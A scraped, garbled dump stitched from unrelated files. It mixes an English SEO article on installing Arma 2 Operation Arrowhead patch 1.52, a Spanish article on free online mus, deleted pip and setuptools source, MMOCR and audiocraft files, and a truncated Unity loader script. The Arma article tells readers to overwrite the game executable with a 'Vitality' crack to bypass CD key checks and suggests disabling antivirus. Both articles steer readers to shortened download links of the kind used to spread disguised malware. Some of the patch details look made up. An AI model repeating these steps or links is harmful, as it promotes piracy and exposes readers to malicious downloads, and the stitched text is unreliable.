          If you are a fan of realistic military simulation games, you have probably heard of Arma 2 Operation Arrowhead, the stand-alone expansion pack for Arma 2, released in 2010 by Bohemia Interactive. This game offers a thrilling and immersive experience of modern warfare in a fictional country called Takistan, where you can take on various roles within the US Army, from infantryman to pilot and tank crew.
    

      -

      However, to enjoy this game to the fullest, you need to make sure that you have the latest patch installed, which is patch 1.52. This patch fixes many bugs and glitches, improves game stability and performance, adds new features and content, and enhances the overall gameplay experience. In this article, we will show you how to download and install patch 1.52 from 1.50, how to check if you have it installed correctly, how to apply the crack file from Vitality to bypass the CD key verification, and how to fix some common issues that may arise after applying the patch.

      -

      Arma 2 Operation Arrowhead Patch Crack 1.52 | Checked


      Download File ☆☆☆ https://urlcod.com/2uHx8A



      -

      Introduction

      -

      What is Arma 2 Operation Arrowhead?

      -

      Arma 2 Operation Arrowhead is a stand-alone expansion pack for Arma 2, a military simulation game developed by Bohemia Interactive and released in 2009. Arma 2 Operation Arrowhead was released in June 2010 and does not require Arma 2 to play, although it can be combined with Arma 2 to create Arma 2 Combined Operations.

      -

      Arma 2 Operation Arrowhead is set three years after the conflict in Chernarus, portrayed in the original Arma 2, and takes place in a new flashpoint in the Green Sea Region, a fictional country called Takistan. The game features a story-driven single-player campaign, where you can enlist into various roles within the US Army, from basic infantrymen to special operatives, pilots, and tank crew. You can also play in cooperative mode with up to four friends or join multiplayer battles with up to 50 players.

      -

      The game boasts a realistic combat environment, with realistic ballistics, round deflection, thermal imaging, materials penetration, day/night cycle, dynamic wind, weather, and environmental effects. The game also offers a huge range of vehicles, weapons, units, and maps to choose from, as well as a powerful editor that allows you to create your own scenarios and missions.

      -

      What is patch 1.52 and why do you need it?

      -

      Patch 1.52 is the latest official update for Arma 2 Operation Arrowhead that was released in June 2010 by Bohemia Interactive. This patch fixes many bugs and glitches that were reported by players and testers, improves game stability and performance, adds new features and content, and enhances the overall gameplay experience.

      -

      -

      Some of the main changes and improvements that patch 1.52 brings are:

      -
        -
      • New features: British Armed Forces Lite (low quality textures), grenade launcher zeroing (use Page Up/Down keys), multiple weapon accessories (use F key), improved AI driving skills.
      • -
          • New content: New missions for all factions, new vehicles (LAV-25, ZU-23, S1203, TT650, Landrover), new weapons (M249, M240, Mk 16/17, M110, SMAW, M136), new models and textures.
    

      • -
      • Bug fixes: Fixed various issues with multiplayer, AI, animations, sounds, weapons, vehicles, missions, and editor.
      • -
      • Performance improvements: Optimized memory usage, reduced stuttering and lagging, improved loading times and stability.
      • -
      -

      You need patch 1.52 to play Arma 2 Operation Arrowhead online with other players who have the same version of the game. You also need patch 1.52 to enjoy the game without any annoying bugs or glitches that may ruin your immersion or gameplay. Patch 1.52 also adds more content and features that make the game more fun and realistic.

      -

      How to check if you have patch 1.52 installed?

      -

      To check if you have patch 1.52 installed, you can do the following:

      -
        -
      • Launch the game and look at the bottom right corner of the main menu screen. You should see the version number of the game displayed there. If it says 1.52, then you have patch 1.52 installed.
      • -
      • Alternatively, you can go to the game directory (usually C:\Program Files\Bohemia Interactive\ArmA 2 Operation Arrowhead) and look for a file called arma2oa.exe. Right-click on it and select Properties. Go to the Details tab and look for the File version field. If it says 1.52.0.0, then you have patch 1.52 installed.
      • -
      -

      How to download and install patch 1.52 from 1.50?

      -

      If you have patch 1.50 installed and want to update to patch 1.52, you can follow these steps:

      -

      Step 1: Download the patch file from a reliable source

      -

          The first thing you need to do is download the patch file from a reliable source. You can download it from the official Bohemia Interactive website or from other trusted websites that host the file. The patch file is about 133 MB in size and is named ARMA2_OA_Build_75234.zip.
    

      -

      Make sure that you download the file from a secure and virus-free source. Do not download the file from any suspicious or unknown websites that may contain malware or spyware. Also, do not download any other files that claim to be patch 1.52 but have a different name or size.

      -

      Step 2: Run the patch installer and follow the instructions

      -

      Once you have downloaded the patch file, you need to run the patch installer and follow the instructions on the screen. To do this:

      -
        -
      • Extract the zip file to a folder on your computer using a program like WinRAR or 7-Zip.
      • -
      • Open the folder and double-click on ARMA2_OA_Build_75234.exe to launch the installer.
      • -
      • Select your language and click Next.
      • -
      • Read and accept the license agreement and click Next.
      • -
      • Select the destination folder where your game is installed (usually C:\Program Files\Bohemia Interactive\ArmA 2 Operation Arrowhead) and click Next.
      • -
      • Wait for the installer to copy and replace the files in your game directory.
      • -
      • Click Finish when the installation is complete.
      • -
      -

      Congratulations! You have successfully installed patch 1.52 for Arma 2 Operation Arrowhead.

      Step 3: Copy the crack file from the Vitality folder to the game directory

      -

      The last thing you need to do is to copy the crack file from the Vitality folder to the game directory. This will allow you to bypass the CD key verification and play the game without any problems. To do this:

      -
        -
      • Open the folder where you extracted the patch file and look for a folder named Vitality.
      • -
      • Open the Vitality folder and copy the file named arma2oa.exe.
      • -
      • Paste the file into your game directory (usually C:\Program Files\Bohemia Interactive\ArmA 2 Operation Arrowhead) and overwrite the existing file.
      • -
      -

      That's it! You have successfully applied the crack file for patch 1.52 for Arma 2 Operation Arrowhead.

      -

      How to fix common issues with patch 1.52?

      -

      Although patch 1.52 is supposed to fix many issues with the game, some players may still encounter some problems after applying the patch. Here are some of the most common issues and how to fix them:

      -

      Issue 1: Patch installation fails or gives an error message

      -

      If you have trouble installing the patch or get an error message during the installation, you may have one of these problems:

      -
        -
      • Your game is not updated to patch 1.50. You need to have patch 1.50 installed before you can install patch 1.52. You can download patch 1.50 from here.
      • -
      • Your game is not installed in the default location. The patch installer may not recognize your game directory if you have installed it in a different location than C:\Program Files\Bohemia Interactive\ArmA 2 Operation Arrowhead. You can either reinstall your game in the default location or manually select your game directory during the patch installation.
      • -
      • Your game is corrupted or modified. The patch installer may not work if your game files are corrupted or modified by other patches, mods, or cracks. You can either reinstall your game from scratch or verify your game files using Steam or other tools.
      • -
      -

      Issue 2: Game crashes or freezes after applying the patch

      -

      If your game crashes or freezes after applying the patch, you may have one of these problems:

      -
        -
      • Your system does not meet the minimum requirements for the game. The patch may increase the demand on your system resources, such as CPU, RAM, and GPU. You can check the minimum and recommended requirements for the game here. You can also lower your graphics settings or close other programs that may be running in the background.
      • -
      • Your drivers are outdated or incompatible. The patch may require updated or compatible drivers for your hardware devices, such as sound card, video card, and motherboard. You can check for driver updates using Windows Update or other tools.
      • -
      • Your antivirus or firewall is blocking the game. The patch may trigger a false positive from your antivirus or firewall software, which may prevent the game from running properly. You can try disabling your antivirus or firewall temporarily or adding an exception for your game directory.
      • -

      Issue 3: Game performance drops or lags after applying the patch

      -

      If your game performance drops or lags after applying the patch, you may have one of these problems:

      -
        -
      • Your game settings are too high for your system. The patch may add more details and effects to the game, which may require more processing power and memory. You can try lowering your game settings, such as resolution, texture quality, view distance, and shadows.
      • -
      • Your game cache is corrupted or outdated. The patch may change some of the game files, which may cause conflicts or errors with your game cache. You can try clearing your game cache by deleting the files in the Documents\ArmA 2 folder.
      • -
      • Your game mods are incompatible or conflicting. The patch may not be compatible or compatible with some of the mods that you have installed for the game, such as custom maps, units, weapons, or scripts. You can try disabling or removing your mods temporarily or updating them to the latest version.
      • -
      -

      Conclusion

      -

      Summary of the main points

      -

      In this article, we have shown you how to download and install patch 1.52 for Arma 2 Operation Arrowhead, how to check if you have it installed correctly, how to apply the crack file from Vitality to bypass the CD key verification, and how to fix some common issues that may arise after applying the patch.

      -

      Patch 1.52 is the latest official update for Arma 2 Operation Arrowhead that fixes many bugs and glitches, improves game stability and performance, adds new features and content, and enhances the overall gameplay experience. It is highly recommended that you install this patch if you want to play Arma 2 Operation Arrowhead online with other players who have the same version of the game or if you want to enjoy the game without any annoying bugs or glitches that may ruin your immersion or gameplay.

      -

      Call to action and final thoughts

      -

      If you have not installed patch 1.52 yet, what are you waiting for? Download it now from a reliable source and follow our simple steps to install it and apply the crack file from Vitality. You will be amazed by how much better your game will run and look after applying this patch.

      -

      If you have any questions or comments about this article or patch 1.52, feel free to leave them below. We would love to hear from you and help you out with any issues that you may have. Thank you for reading and happy gaming!

      -

      FAQs

      -

      Q: Can I play Arma 2 Operation Arrowhead without patch 1.52?

      -

      A: Yes, you can play Arma 2 Operation Arrowhead without patch 1.52, but you will miss out on many improvements and fixes that this patch offers. You will also not be able to play online with other players who have patch 1.52 installed.

      -

      Q: Can I install patch 1.52 over any previous version of the game?

      -

      A: No, you can only install patch 1.52 over patch 1.50. If you have an older version of the game, you need to update it to patch 1.50 first before installing patch 1.52.

      -

      Q: Can I use patch 1.52 with Arma 2 Combined Operations?

      -

      A: Yes, you can use patch 1.52 with Arma 2 Combined Operations, which is a combination of Arma 2 and Arma 2 Operation Arrowhead. However, you need to make sure that both games are updated to their latest patches (Arma 2: Patch 1.11 and Arma 2 Operation Arrowhead: Patch 1.52).

      -

      Q: Can I use patch 1.52 with other mods or addons for the game?

      -

      A: Yes, you can use patch 1.52 with other mods or addons for the game, as long as they are compatible or updated for this patch. Some of the popular mods that work with patch 1.52 are ACE (Advanced Combat Environment), ACRE (Advanced Combat Radio Environment), JSRS (Jarhead's Sound Redeployment), and CBA (Community Base Addons).

      -

      Q: Where can I find more information about patch 1.52?

      -

      A: You can find more information about patch 1.52 on the official Bohemia Interactive website or on the official Arma 2 Operation Arrowhead forums.

      b2dd77e56b
      -
      -
      \ No newline at end of file diff --git a/spaces/tioseFevbu/cartoon-converter/scripts/Jugar Al Mus Gratis Sin Registrarse.md b/spaces/tioseFevbu/cartoon-converter/scripts/Jugar Al Mus Gratis Sin Registrarse.md deleted file mode 100644 index 179808779785724723386ed06191b2552724d0a4..0000000000000000000000000000000000000000 --- a/spaces/tioseFevbu/cartoon-converter/scripts/Jugar Al Mus Gratis Sin Registrarse.md +++ /dev/null @@ -1,19 +0,0 @@ -
      -

          How can you play mus for free without registering?
    

      -

          Mus is a card game that is very popular in Spain and other Spanish-speaking countries. It is a game of strategy, bluffing, and betting that is played in pairs with a 40-card Spanish deck.
    

      -

      jugar al mus gratis sin registrarse


      DOWNLOADhttps://urlcod.com/2uHvLc



      -

          If you want to play mus for free without registering, there are several options available on the Internet. One of them is the MusOnline website, which lets you play mus online against other real players or against bots. You do not need to create an account or download any program; just open the page and choose a game table.
    

      -

          Another option is the MusGratis website, which also lets you play mus for free without registering. In this case, you can play classic mus or mus a 8 reyes, a variant with more cards and more playing possibilities. You can also customize your avatar and chat with other players.
    

      -

          Finally, if you prefer to play mus for free without registering from your phone or tablet, you can download the Don Mus app, available for Android and iOS. This app lets you play mus online or offline, with different difficulty levels and configuration options. You can also take part in tournaments and leagues and win virtual prizes.
    

      -

          As you can see, there are many ways to enjoy mus for free without registering. Just pick the one you like best and start playing. Have fun!
    

      -

      - -

          Mus is a game of uncertain origin, although it is believed to have Arab, French, and Italian influences. It began to be played in the 16th century and became popular in the 19th century, especially in northern Spain. Today it is one of the most widely played card games in the country and has numerous official championships and tournaments.
    

      -

          To play mus you need a 40-card Spanish deck, divided into four suits: oros, copas, espadas, and bastos. Each suit has ten cards: seven numbered 1 to 7 and three face cards, sota (10), caballo (11), and rey (12). The value of the cards depends on the type of round: grande, chica, pares, or juego. The aim of the game is to win the largest number of envites, the bets made in each round.
    

      -

          Mus is played in pairs, with partners sitting across from each other. The dealer, or mano, deals four cards to each player and then the round, or lance, begins. Each round has four types of play: grande, chica, pares, and juego. In each of them, players can pass, bet, or raise. Whoever wins each play takes as many points as there were bets. The game ends when one of the pairs reaches 40 points.
    
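          To make the deck and the deal described above concrete, here is a minimal Python sketch. It only illustrates the rules as stated (40-card Spanish deck, four players, four cards each); the function names are my own invention and are not part of any of the sites or apps mentioned in this article.

    ```python
    import random

    # Spanish deck used in mus: 4 suits x 10 cards (1-7 plus sota=10, caballo=11, rey=12).
    SUITS = ["oros", "copas", "espadas", "bastos"]
    RANKS = [1, 2, 3, 4, 5, 6, 7, 10, 11, 12]  # sota, caballo, rey are 10, 11, 12

    def build_deck():
        """Return the 40-card Spanish deck as (rank, suit) tuples."""
        return [(rank, suit) for suit in SUITS for rank in RANKS]

    def deal(deck, players=4, cards_each=4):
        """Shuffle the deck and deal four cards to each of the four players."""
        random.shuffle(deck)
        return [deck[i * cards_each:(i + 1) * cards_each] for i in range(players)]

    if __name__ == "__main__":
        hands = deal(build_deck())
        for i, hand in enumerate(hands, start=1):
            print(f"Player {i}: {hand}")
    ```

          From here, the four lances (grande, chica, pares, juego) are just different ways of comparing the four-card hands, and play continues until one pair reaches 40 points.
    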

      - -

          Mus is a game that requires skill, memory, calculation and, above all, deception and bluffing. Players must try to hide their cards and make their opponents believe they hold better or worse cards than they really do. To do this, they use señas, discreet signals made with the face, hands, or feet. These signals are part of the charm and fun of the game, but they can also be a source of argument and controversy.
    

      -

          Mus allows many variants and local rules. Some of the best known are mus a 8 reyes, mus a 4 reyes, French mus, Argentine mus, and Chilean mus. Each of these variants has its own particularities and rules that make it more or less complex or interesting. The important thing is that the players agree on the rules before starting and then stick to them.
    

      -

          Mus is not just a way to pass the time; it also has benefits for mental and social health. It stimulates memory, concentration, reasoning, and decision-making. It also encourages interaction, communication, camaraderie, and good humor among players. That is why mus is a game worth playing often and in good company.
    

      7b8c122e87
      -
      -
      \ No newline at end of file diff --git a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/pip/_internal/operations/install/__init__.py b/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/pip/_internal/operations/install/__init__.py deleted file mode 100644 index 24d6a5dd31fe33b03f90ed0f9ee465253686900c..0000000000000000000000000000000000000000 --- a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/pip/_internal/operations/install/__init__.py +++ /dev/null @@ -1,2 +0,0 @@ -"""For modules related to installing packages. -""" diff --git a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/pip/_vendor/pygments/formatters/pangomarkup.py b/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/pip/_vendor/pygments/formatters/pangomarkup.py deleted file mode 100644 index bd00866b8b95a98edc8956608e895a6329a944a0..0000000000000000000000000000000000000000 --- a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/pip/_vendor/pygments/formatters/pangomarkup.py +++ /dev/null @@ -1,83 +0,0 @@ -""" - pygments.formatters.pangomarkup - ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - - Formatter for Pango markup output. - - :copyright: Copyright 2006-2022 by the Pygments team, see AUTHORS. - :license: BSD, see LICENSE for details. -""" - -from pip._vendor.pygments.formatter import Formatter - - -__all__ = ['PangoMarkupFormatter'] - - -_escape_table = { - ord('&'): '&', - ord('<'): '<', -} - - -def escape_special_chars(text, table=_escape_table): - """Escape & and < for Pango Markup.""" - return text.translate(table) - - -class PangoMarkupFormatter(Formatter): - """ - Format tokens as Pango Markup code. It can then be rendered to an SVG. - - .. versionadded:: 2.9 - """ - - name = 'Pango Markup' - aliases = ['pango', 'pangomarkup'] - filenames = [] - - def __init__(self, **options): - Formatter.__init__(self, **options) - - self.styles = {} - - for token, style in self.style: - start = '' - end = '' - if style['color']: - start += '' % style['color'] - end = '' + end - if style['bold']: - start += '' - end = '' + end - if style['italic']: - start += '' - end = '' + end - if style['underline']: - start += '' - end = '' + end - self.styles[token] = (start, end) - - def format_unencoded(self, tokensource, outfile): - lastval = '' - lasttype = None - - outfile.write('') - - for ttype, value in tokensource: - while ttype not in self.styles: - ttype = ttype.parent - if ttype == lasttype: - lastval += escape_special_chars(value) - else: - if lastval: - stylebegin, styleend = self.styles[lasttype] - outfile.write(stylebegin + lastval + styleend) - lastval = escape_special_chars(value) - lasttype = ttype - - if lastval: - stylebegin, styleend = self.styles[lasttype] - outfile.write(stylebegin + lastval + styleend) - - outfile.write('') diff --git a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/setuptools/_distutils/spawn.py b/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/setuptools/_distutils/spawn.py deleted file mode 100644 index acd20148c7e6f8a81fbf1dfdea0feadf6bc6160f..0000000000000000000000000000000000000000 --- a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/setuptools/_distutils/spawn.py +++ /dev/null @@ -1,107 +0,0 @@ -"""distutils.spawn - -Provides the 'spawn()' function, a front-end to various platform- -specific functions for launching another program in a sub-process. 
-Also provides the 'find_executable()' to search the path for a given -executable name. -""" - -import sys -import os -import subprocess - -from distutils.errors import DistutilsExecError -from distutils.debug import DEBUG -from distutils import log - - -def spawn(cmd, search_path=1, verbose=0, dry_run=0, env=None): - """Run another program, specified as a command list 'cmd', in a new process. - - 'cmd' is just the argument list for the new process, ie. - cmd[0] is the program to run and cmd[1:] are the rest of its arguments. - There is no way to run a program with a name different from that of its - executable. - - If 'search_path' is true (the default), the system's executable - search path will be used to find the program; otherwise, cmd[0] - must be the exact path to the executable. If 'dry_run' is true, - the command will not actually be run. - - Raise DistutilsExecError if running the program fails in any way; just - return on success. - """ - # cmd is documented as a list, but just in case some code passes a tuple - # in, protect our %-formatting code against horrible death - cmd = list(cmd) - - log.info(subprocess.list2cmdline(cmd)) - if dry_run: - return - - if search_path: - executable = find_executable(cmd[0]) - if executable is not None: - cmd[0] = executable - - env = env if env is not None else dict(os.environ) - - if sys.platform == 'darwin': - from distutils.util import MACOSX_VERSION_VAR, get_macosx_target_ver - - macosx_target_ver = get_macosx_target_ver() - if macosx_target_ver: - env[MACOSX_VERSION_VAR] = macosx_target_ver - - try: - proc = subprocess.Popen(cmd, env=env) - proc.wait() - exitcode = proc.returncode - except OSError as exc: - if not DEBUG: - cmd = cmd[0] - raise DistutilsExecError("command %r failed: %s" % (cmd, exc.args[-1])) from exc - - if exitcode: - if not DEBUG: - cmd = cmd[0] - raise DistutilsExecError( - "command %r failed with exit code %s" % (cmd, exitcode) - ) - - -def find_executable(executable, path=None): - """Tries to find 'executable' in the directories listed in 'path'. - - A string listing directories separated by 'os.pathsep'; defaults to - os.environ['PATH']. Returns the complete filename or None if not found. - """ - _, ext = os.path.splitext(executable) - if (sys.platform == 'win32') and (ext != '.exe'): - executable = executable + '.exe' - - if os.path.isfile(executable): - return executable - - if path is None: - path = os.environ.get('PATH', None) - if path is None: - try: - path = os.confstr("CS_PATH") - except (AttributeError, ValueError): - # os.confstr() or CS_PATH is not available - path = os.defpath - # bpo-35755: Don't use os.defpath if the PATH environment variable is - # set to an empty string - - # PATH='' doesn't match, whereas PATH=':' looks in the current directory - if not path: - return None - - paths = path.split(os.pathsep) - for p in paths: - f = os.path.join(p, executable) - if os.path.isfile(f): - # the file exists, we have a shot at spawn working - return f - return None diff --git a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/setuptools/glob.py b/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/setuptools/glob.py deleted file mode 100644 index 87062b8187fa4f74a8c4edbaa60bd9a8b2d506a4..0000000000000000000000000000000000000000 --- a/spaces/tjburns/ask_marcus_aurelius/.venv/lib/python3.10/site-packages/setuptools/glob.py +++ /dev/null @@ -1,167 +0,0 @@ -""" -Filename globbing utility. Mostly a copy of `glob` from Python 3.5. 
- -Changes include: - * `yield from` and PEP3102 `*` removed. - * Hidden files are not ignored. -""" - -import os -import re -import fnmatch - -__all__ = ["glob", "iglob", "escape"] - - -def glob(pathname, recursive=False): - """Return a list of paths matching a pathname pattern. - - The pattern may contain simple shell-style wildcards a la - fnmatch. However, unlike fnmatch, filenames starting with a - dot are special cases that are not matched by '*' and '?' - patterns. - - If recursive is true, the pattern '**' will match any files and - zero or more directories and subdirectories. - """ - return list(iglob(pathname, recursive=recursive)) - - -def iglob(pathname, recursive=False): - """Return an iterator which yields the paths matching a pathname pattern. - - The pattern may contain simple shell-style wildcards a la - fnmatch. However, unlike fnmatch, filenames starting with a - dot are special cases that are not matched by '*' and '?' - patterns. - - If recursive is true, the pattern '**' will match any files and - zero or more directories and subdirectories. - """ - it = _iglob(pathname, recursive) - if recursive and _isrecursive(pathname): - s = next(it) # skip empty string - assert not s - return it - - -def _iglob(pathname, recursive): - dirname, basename = os.path.split(pathname) - glob_in_dir = glob2 if recursive and _isrecursive(basename) else glob1 - - if not has_magic(pathname): - if basename: - if os.path.lexists(pathname): - yield pathname - else: - # Patterns ending with a slash should match only directories - if os.path.isdir(dirname): - yield pathname - return - - if not dirname: - yield from glob_in_dir(dirname, basename) - return - # `os.path.split()` returns the argument itself as a dirname if it is a - # drive or UNC path. Prevent an infinite recursion if a drive or UNC path - # contains magic characters (i.e. r'\\?\C:'). - if dirname != pathname and has_magic(dirname): - dirs = _iglob(dirname, recursive) - else: - dirs = [dirname] - if not has_magic(basename): - glob_in_dir = glob0 - for dirname in dirs: - for name in glob_in_dir(dirname, basename): - yield os.path.join(dirname, name) - - -# These 2 helper functions non-recursively glob inside a literal directory. -# They return a list of basenames. `glob1` accepts a pattern while `glob0` -# takes a literal basename (so it only has to check for its existence). - - -def glob1(dirname, pattern): - if not dirname: - if isinstance(pattern, bytes): - dirname = os.curdir.encode('ASCII') - else: - dirname = os.curdir - try: - names = os.listdir(dirname) - except OSError: - return [] - return fnmatch.filter(names, pattern) - - -def glob0(dirname, basename): - if not basename: - # `os.path.split()` returns an empty basename for paths ending with a - # directory separator. 'q*x/' should match only directories. - if os.path.isdir(dirname): - return [basename] - else: - if os.path.lexists(os.path.join(dirname, basename)): - return [basename] - return [] - - -# This helper function recursively yields relative pathnames inside a literal -# directory. - - -def glob2(dirname, pattern): - assert _isrecursive(pattern) - yield pattern[:0] - for x in _rlistdir(dirname): - yield x - - -# Recursively yields relative pathnames inside a literal directory. 
-def _rlistdir(dirname): - if not dirname: - if isinstance(dirname, bytes): - dirname = os.curdir.encode('ASCII') - else: - dirname = os.curdir - try: - names = os.listdir(dirname) - except os.error: - return - for x in names: - yield x - path = os.path.join(dirname, x) if dirname else x - for y in _rlistdir(path): - yield os.path.join(x, y) - - -magic_check = re.compile('([*?[])') -magic_check_bytes = re.compile(b'([*?[])') - - -def has_magic(s): - if isinstance(s, bytes): - match = magic_check_bytes.search(s) - else: - match = magic_check.search(s) - return match is not None - - -def _isrecursive(pattern): - if isinstance(pattern, bytes): - return pattern == b'**' - else: - return pattern == '**' - - -def escape(pathname): - """Escape all special characters. - """ - # Escaping is done by wrapping any of "*?[" between square brackets. - # Metacharacters do not work in the drive part and shouldn't be escaped. - drive, pathname = os.path.splitdrive(pathname) - if isinstance(pathname, bytes): - pathname = magic_check_bytes.sub(br'[\1]', pathname) - else: - pathname = magic_check.sub(r'[\1]', pathname) - return drive + pathname diff --git a/spaces/tomofi/MMOCR/mmocr/version.py b/spaces/tomofi/MMOCR/mmocr/version.py deleted file mode 100644 index 6697c2f4d34b42fb7af44990757f6cca7f75abe0..0000000000000000000000000000000000000000 --- a/spaces/tomofi/MMOCR/mmocr/version.py +++ /dev/null @@ -1,4 +0,0 @@ -# Copyright (c) Open-MMLab. All rights reserved. - -__version__ = '0.4.1' -short_version = __version__ diff --git a/spaces/trttung1610/musicgen/audiocraft/grids/compression/encodec_base_24khz.py b/spaces/trttung1610/musicgen/audiocraft/grids/compression/encodec_base_24khz.py deleted file mode 100644 index 117b2b1e496ca31b3d614672b472c9213cedb4ad..0000000000000000000000000000000000000000 --- a/spaces/trttung1610/musicgen/audiocraft/grids/compression/encodec_base_24khz.py +++ /dev/null @@ -1,28 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -""" -Grid search file, simply list all the exp you want in `explorer`. -Any new exp added there will be scheduled. -You can cancel and experiment by commenting its line. - -This grid shows how to train a base causal EnCodec model at 24 kHz. 
-""" - -from ._explorers import CompressionExplorer -from ...environment import AudioCraftEnvironment - - -@CompressionExplorer -def explorer(launcher): - partitions = AudioCraftEnvironment.get_slurm_partitions(['team', 'global']) - launcher.slurm_(gpus=8, partition=partitions) - # base causal EnCodec trained on monophonic audio sampled at 24 kHz - launcher.bind_(solver='compression/encodec_base_24khz') - # replace this by the desired dataset - launcher.bind_(dset='audio/example') - # launch xp - launcher() diff --git a/spaces/unity/ML-Agents-PushBlock/Build/ML-Agents-PushBlock.loader.js b/spaces/unity/ML-Agents-PushBlock/Build/ML-Agents-PushBlock.loader.js deleted file mode 100644 index 7205575e8b86ff38f6022e337aec1f34ec4f1b8b..0000000000000000000000000000000000000000 --- a/spaces/unity/ML-Agents-PushBlock/Build/ML-Agents-PushBlock.loader.js +++ /dev/null @@ -1,2 +0,0 @@ -function createUnityInstance(e,t,r){function n(e,r){if(!n.aborted&&t.showBanner)return"error"==r&&(n.aborted=!0),t.showBanner(e,r);switch(r){case"error":console.error(e);break;case"warning":console.warn(e);break;default:console.log(e)}}function o(e){var t=e.reason||e.error,r=t?t.toString():e.message||e.reason||"",n=t&&t.stack?t.stack.toString():"";if(n.startsWith(r)&&(n=n.substring(r.length)),r+="\n"+n.trim(),r&&f.stackTraceRegExp&&f.stackTraceRegExp.test(r)){var o=e.filename||t&&(t.fileName||t.sourceURL)||"",a=e.lineno||t&&(t.lineNumber||t.line)||0;i(r,o,a)}}function a(e){e.preventDefault()}function i(e,t,r){if(e.indexOf("fullscreen error")==-1){if(f.startupErrorHandler)return void f.startupErrorHandler(e,t,r);if(!(f.errorHandler&&f.errorHandler(e,t,r)||(console.log("Invoking error handler due to\n"+e),"function"==typeof dump&&dump("Invoking error handler due to\n"+e),i.didShowErrorMessage))){var e="An error occurred running the Unity content on this page. See your browser JavaScript console for more info. The error was:\n"+e;e.indexOf("DISABLE_EXCEPTION_CATCHING")!=-1?e="An exception has occurred, but exception handling has been disabled in this build. If you are the developer of this content, enable exceptions in your project WebGL player settings to be able to catch the exception or see the stack trace.":e.indexOf("Cannot enlarge memory arrays")!=-1?e="Out of memory. If you are the developer of this content, try allocating more memory to your WebGL build in the WebGL player settings.":e.indexOf("Invalid array buffer length")==-1&&e.indexOf("Invalid typed array length")==-1&&e.indexOf("out of memory")==-1&&e.indexOf("could not allocate memory")==-1||(e="The browser could not allocate enough memory for the WebGL content. 
If you are the developer of this content, try allocating less memory to your WebGL build in the WebGL player settings."),alert(e),i.didShowErrorMessage=!0}}}function s(e,t){if("symbolsUrl"!=e){var n=f.downloadProgress[e];n||(n=f.downloadProgress[e]={started:!1,finished:!1,lengthComputable:!1,total:0,loaded:0}),"object"!=typeof t||"progress"!=t.type&&"load"!=t.type||(n.started||(n.started=!0,n.lengthComputable=t.lengthComputable),n.total=t.total,n.loaded=t.loaded,"load"==t.type&&(n.finished=!0));var o=0,a=0,i=0,s=0,l=0;for(var e in f.downloadProgress){var n=f.downloadProgress[e];if(!n.started)return 0;i++,n.lengthComputable?(o+=n.loaded,a+=n.total,s++):n.finished||l++}var d=i?(i-l-(a?s*(a-o)/a:0))/i:0;r(.9*d)}}function l(e,t){return new Promise(function(r,n){try{for(var o in w)if(w[o].hasUnityMarker(e)){t&&console.log('You can reduce startup time if you configure your web server to add "Content-Encoding: '+o+'" response header when serving "'+t+'" file.');var a=w[o];if(!a.worker){var i=URL.createObjectURL(new Blob(["this.require = ",a.require.toString(),"; this.decompress = ",a.decompress.toString(),"; this.onmessage = ",function(e){var t={id:e.data.id,decompressed:this.decompress(e.data.compressed)};postMessage(t,t.decompressed?[t.decompressed.buffer]:[])}.toString(),"; postMessage({ ready: true });"],{type:"application/javascript"}));a.worker=new Worker(i),a.worker.onmessage=function(e){return e.data.ready?void URL.revokeObjectURL(i):(this.callbacks[e.data.id](e.data.decompressed),void delete this.callbacks[e.data.id])},a.worker.callbacks={},a.worker.nextCallbackId=0}var s=a.worker.nextCallbackId++;return a.worker.callbacks[s]=r,void a.worker.postMessage({id:s,compressed:e},[e.buffer])}r(e)}catch(e){n(e)}})}function d(e){s(e);var t=f.cacheControl(f[e]),r=f.companyName&&f.productName?f.cachedFetch:f.fetchWithProgress,o=f[e],a=/file:\/\//.exec(o)?"same-origin":void 0,i=r(f[e],{method:"GET",companyName:f.companyName,productName:f.productName,control:t,mode:a,onProgress:function(t){s(e,t)}});return i.then(function(t){return l(t.parsedBody,f[e])}).catch(function(t){var r="Failed to download file "+f[e];"file:"==location.protocol?n(r+". Loading web pages via a file:// URL without a web server is not supported by this browser. Please use a local development web server to host Unity content, or use the Unity Build and Run option.","error"):console.error(r)})}function u(){return d("frameworkUrl").then(function(e){var t=URL.createObjectURL(new Blob([e],{type:"application/javascript"}));return new Promise(function(e,r){var o=document.createElement("script");o.src=t,o.onload=function(){if("undefined"==typeof unityFramework||!unityFramework){var r=[["br","br"],["gz","gzip"]];for(var a in r){var i=r[a];if(f.frameworkUrl.endsWith("."+i[0])){var s="Unable to parse "+f.frameworkUrl+"!";if("file:"==location.protocol)return void n(s+" Loading pre-compressed (brotli or gzip) content via a file:// URL without a web server is not supported by this browser. Please use a local development web server to host compressed Unity content, or use the Unity Build and Run option.","error");if(s+=' This can happen if build compression was enabled but web server hosting the content was misconfigured to not serve the file with HTTP Response Header "Content-Encoding: '+i[1]+'" present. 
Check browser Console and Devtools Network tab to debug.',"br"==i[0]&&"http:"==location.protocol){var l=["localhost","127.0.0.1"].indexOf(location.hostname)!=-1?"":"Migrate your server to use HTTPS.";s=/Firefox/.test(navigator.userAgent)?"Unable to parse "+f.frameworkUrl+'!
      If using custom web server, verify that web server is sending .br files with HTTP Response Header "Content-Encoding: br". Brotli compression may not be supported in Firefox over HTTP connections. '+l+' See https://bugzilla.mozilla.org/show_bug.cgi?id=1670675 for more information.':"Unable to parse "+f.frameworkUrl+'!
